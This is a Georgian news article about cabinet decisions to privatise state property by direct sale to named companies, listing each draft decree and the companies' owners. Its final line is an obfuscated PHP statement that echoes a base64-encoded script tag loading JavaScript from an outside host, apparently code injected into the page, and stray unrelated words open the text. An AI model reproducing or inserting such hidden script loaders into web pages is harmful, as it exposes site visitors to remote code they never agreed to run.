celsiusi
ავერსი შნაიდერი

დღეს საქართველოს მთავრობა მინისტრთა კაბინეტის სხდომაზე კონკრეტული ბიზნესებისთვის უძრავი ქონების პირდაპირი ფორმით პრივატიზების შესახებ მიიღებს გადაწყვეტილებებს - ამის შესახებ მთავრობის სხდომის დღის წესრიგიდან ხდება ცნობილი. თუმცა, უშუალოდ დღის წესრიგში არაა წარმოდგენილი ინფორმაცია, თუ რა ქონებაზე არის საუბარი, ამის მიზეზია ის, რომ 2020 წლის შემდეგ მთავრობის ადმინისტრაცია მიღებულ განკარგულებებს არ აქვეყნებს და ისინი არც საკანონმდებლო მაცნეზე არ ქვეყნდება. შესაბამისად, საჯაროდ უცნობია რა გადაწყვეტილებები მიიღო მთავრობამ.

დღესვე მთავრობის სხდომაზე გადაწყვეტილებები მიიღეს წარსულში კონკრეტული კომპანიებისთვის პირობით გადაცემული უძრავი ქონებების პრივატიზების ვალდებულებების მოდიფიკაციის შესახებაც, თუმცა იმის გამო, რომ წინა დადგენილებებიც არაა საჯაროდ გამოქვეყნებული, უცნობია რა მოდიფიკაციები შევიდა აღნიშნულ საინვესტიციო პირობებში. ბიზნესები რომლებიც შესახებაც შესაბამისი გადაწყვეტილებები მიიღეს უძრავი ქონების; სოფლის მეურნეობის; ენერგეტიკისა და წარმოების სფეროში საქმიანობენ.

მთავრობის განკარგულებების პროექტების ჩამონათვალი:

- საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „სითი ლოფტისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2021 წლის 13 ივლისის №1187 განკარგულებაში ცვლილების შეტანის შესახებ”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის მონაცემებით, “სითი ლოფტის” 100%-იანი წილის მფლობელია ბიზნესმენი თემურ უგულავა.

- საქართველოს მთავრობის განკარგულების პროექტი ,,შპს „უდაბნოსა“ და შპს „უდაბნო სოფელის“ საქმიანობის ხელშესაწყობად რიგ ღონისძიებათა განხორციელების შესახებ”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, აღნიშნული კომპანიები შედის “უდაბნო ჰოლდინგის” შემადგენლობაში, რომლის მფლობელიც თავის მხრივ ბიზნესმენი თემურ უგულავაა.

- საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ნივთის შპს „კომერციალ სფოთისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, შპს “კომერციალ სფოთის” დამფუძნებელია ბიზნესმენი რუსლან ჯახაია.

- საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ტანდემ ესთეიტისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, კომპანია “ტანდემ ესთეიტი” 2023 წელს არის დაფუძნებული და მისი მფლობელი გერმანიის მოქალაქე რუსლან იგნატიევია.

- საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „აკვაკულტურა საქართველოსათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, კომპანია “აკვაკულტურა საქართველო” 2021 წელს არის დაფუძნებული და მისი მფლობელები პაატა მოდებაძე და გიორგი ქუთათელაძე არიან.

- საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების შპს „კაპიტალ ჰოლდერისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, “კაპიტალ ჰოლდერი” 2023 წელს დაფუძნდა და მისი მფლობელია ბიზნესმენი ივანე თევდორაშვილი.

- საქართველოს მთავრობის განკარგულების პროექტი ,,სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების შპს „პროფით ინვესტისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, “პროფიტ ინვესტი” 2023 წელს დაფუძნდა და მისი მფლობელია ბიზნესმენი ივანე თევდორაშვილი.

- საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ნივთის შპს „კავკას აგროსათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზებისა და საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს სისტემაში შემავალი სსიპ- სახელმწიფო ქონების ეროვნული სააგენტოსათვის სახელმწიფო ქონების იჯარის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ“ საქართველოს მთავრობის 2018 წლის 8 ივნისის №1266 განკარგულებაში ცვლილების შეტანის თაობაზე”

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, კომპანია “კავკას აგრო” 2016 წელს დაფუძნდა და მისი მფლობელები არიან დურსუნ კასუმოვი და სამირა ტომარაძე.

- საქართველოს მთავრობის განკარგულების პროექტი ,,საქართველოს მთავრობასა და შპს ,,ჰიდროენერჯის’’ შორის ,,სორგითი 3 ჰესის’’ ჰიდროელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე“

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის თანახმად, კომპანია ჰიდროენერჯი 2014 წელს არის დაფუძნებული და მისი მფლობელები ლაშა იორდანიშვილი და დავით უგრელიძე არიან.

- საქართველოს მთავრობის განკარგულების პროექტი ,,საქართველოს მთავრობასა და შპს ,,ღუნჯა ჰესს’’ შორის ,,ღუნჯა ჰესის’’ ჰიდროელექტროსადგურის შესახებ დასადები ხელშეკრულების თაობაზე“

მომხსენებელი: ლ. დავითაშვილი

ბიზნეს რეესტრის მონაცემებით, “ღუნჯა ჰესი” 2022 წელს დაფუძნდა და მისი მფლობელები გიორგი მაისურაძე და ლევან მოსავლიძე არიან. 

314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");